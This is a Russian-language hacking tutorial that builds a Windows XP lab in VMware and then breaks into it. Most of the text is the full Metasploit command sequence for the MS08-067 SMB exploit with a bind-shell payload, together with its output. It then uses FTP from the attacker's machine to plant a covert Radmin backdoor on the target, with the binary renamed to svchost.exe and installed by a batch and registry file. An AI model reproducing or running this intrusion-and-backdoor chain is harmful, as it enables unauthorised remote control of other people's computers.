ВЗЛОМ ПК, под управлением Windows.
КЛАССИФИКАЦИЯ АТАК.
– Атаки на протокол
– Атаки на ПО
– Атаки на пользователя
ПОЛИГОН ДЛЯ ИСПЫТАНИЙ.
Необходимый софт:
Любой дистрибьютив Windows XP (SP2,SP3 )
Виртуальная машина Vmware.
Итак, нам нужно где-то законно, развивать свои навыки, для этого создадим
виртуальную машину и установим на нее так любимый пользователями Windows,
надеюсь все уже скачали виртуальную машину Vmware, устанавливаем и
открываем.
Создаем новую машину в Vmware, для этого зажимаем CTRL+N, и следум
инструкциям, там все интуитивно понятно. Теперь идем в Edit => Virtual Network
Setting и переходим на вкладку Host Virtual Adapter
Нажимаем add и создаем нужное количество виртуальных адаптеров. Затем идем в DHCP и удаляем от туда все адаптеры кроме, Wmnet1 и Wmnet8. Тут можно нажать Принять и ОК, или же сходить в Host Virtual Network Mapping и настроить каждому
адаптеру свой ip, если этого не сделать, то они будут назначенны автоматически.
Заходим в настройки виртуальной манины CTR+D, переходим на вкладку Enternet, выбираем Custop Specifnc: virtual network и назначаем любой понравившейся интерфейс, конечно, кроме Wmnet1 и Wmnet8, я выбрал Vmnet2.
Теперь переходим к CD-ROM, ставим галочку на Use ISO image, жмем обзор и выбираем образ с которого будем устанавливать Windows, мы также можем установить его с диска отметив Use physical drive, и выбрав соответствующий привод.
Ну вот приготовления закончены теперь запускаем виртуальную машину и жмем F12, если вы все правильно сконфигурировали, то перед вами появится окно установки. В моем случае оно выглядит так, у вас может отличатся, завит от уставливаемой ОС. Я использовал сборку ZVERDVD.
УСТАНОВКА СВЯЗИ.
Необходимый софт:
ФТП — сервер (Serv -U)
Значит, после установки необходимо настроить сеть, между нашим реальным ПК и Виртуальным. Для этого идем в свойства подключения виртуального адаптера, который вы выбрали на вкладке Enternet у меня это Vmnet2.
IP адресс 192.168.1.3
Маска подсети 255.255.255.0
Теперь загружаем виртуальную машину и также идем в сетевые подключения и смотрим свойства tcp/ip.
Настраиваем следующим образом:
IP адресс 192.168.1.10
Маска подсети 255.255.255.0
Основной шлюз 192.168.1.3
Осталось только поставить ФТП сервер на наш реальный ПК. Я выбрал Serv -U, он заводится с пол аборота. Важно, когда будете создавать пользователя, создавайте без пароля, да и вешайте фтп на стандартный 21 порт, используемый протокол тоже ФТП.
ПРИМЕР.
Необходимый софт:
Metasploit 3.2
Radmin Viewer 3
RadminServer (спец. Сборка)
Xspider 7.5
Сканим комп xspider'ом
Для взлома мы бужем использовать, недавно обнаруженную уязвимость в службе Server(ms08_067).Запускаем Metasploit 3 Web, ждем пока загрузится и затем в адресной строке браузера пишем 127.0.0.1:55555.
use windows/smb/ms08_067_netapi ; наш сплоит
set PAYLOAD generic/shell_bind_tcp ; выбираем начинку
PAYLOAD => generic/shell_bind_tcp
set RHOST 192.168.1.10 ; хост-жертва
RHOST => 192.168.1.10
set LPORT 7777 ; локальный порт
LPORT => 7777
set RPORT 445 ; удаленный порт
RPORT => 445
exploit
Started bind handler
Automatically detecting the target...
Fingerprint: Windows XP Service Pack 3 - lang:Russian
Selected Target: Windows XP SP3 Russian (NX)
Triggering the vulnerability...
Command shell session 1 opened (192.168.1.3:5583 -> 192.168.1.10:7777)
Microsoft Windows XP [‚¥àá¨ï 5.1.2600]
(‘) Š®à¯®à æ¨ï Œ ©ªà®á®äâ, 1985-2001.
C:\WINDOWS\system32>
Получили командную строку на удаленной системе
{создаем в папке windows, папку helps}
cd c:\windows
mkdir helps
{коннектимся к нашему компу}
ftp192.168.1.3
Пользователь (192.168.1.3:(none)): kerny
{успешный коннект, идем c:\kerny\ нашего фтп, именно там хранится радмин}
cd c:\kerny\
dir
{файлы радмина}
drw-rw-rw- 1 user group 0 Mar 2 20:10 .
drw-rw-rw- 1 user group 0 Mar 2 20:10 ..
-rw-rw-rw- 1 user group 547 Mar 2 20:10 111.bat
-rw-rw-rw- 1 user group 940 Mar 2 20:10 111.reg
-rw-rw-rw- 1 user group 40448 Mar 2 20:10 AdmDll.dll
-rw-rw-rw- 1 user group 17408 Mar 2 20:10 raddrv.dll
-rw-rw-rw- 1 user group 152576 Mar 2 20:10 svchost.exe
{сливаем файлы на комп жертвы в папку windows\helps}
get 111.bat c:\windows\helps\111.bat
get 111.reg c:\windows\helps\111.reg
get AdmDll.dll c:\windows\helps\AdmDll.dll
get raddrv.dll c:\windows\helps\raddrv.dll
get svchost.exe c:\windows\helps\svchost.exe
{отключаемся от нашего фтп}
bye
{идем в папку, и проверяем скачались ли файлы}
cd c:\windows\helps
dir
-rw-rw-rw- 1 user group 547 Mar 2 20:11 111.bat
-rw-rw-rw- 1 user group 940 Mar 2 20:11 111.reg
-rw-rw-rw- 1 user group 40448 Mar 2 20:12 AdmDll.dll
-rw-rw-rw- 1 user group 17408 Mar 2 20:12 raddrv.dll
-rw-rw-rw- 1 user group 152576 Mar 2 20:12 svchost.exe
{устанавливаем Radmin у жертвы}
111.bat
Теперь запускаем Radmin Viewer и конектимся, как видим все прошло успешно.
Снял видео, там же и статья отформатированная в pdf: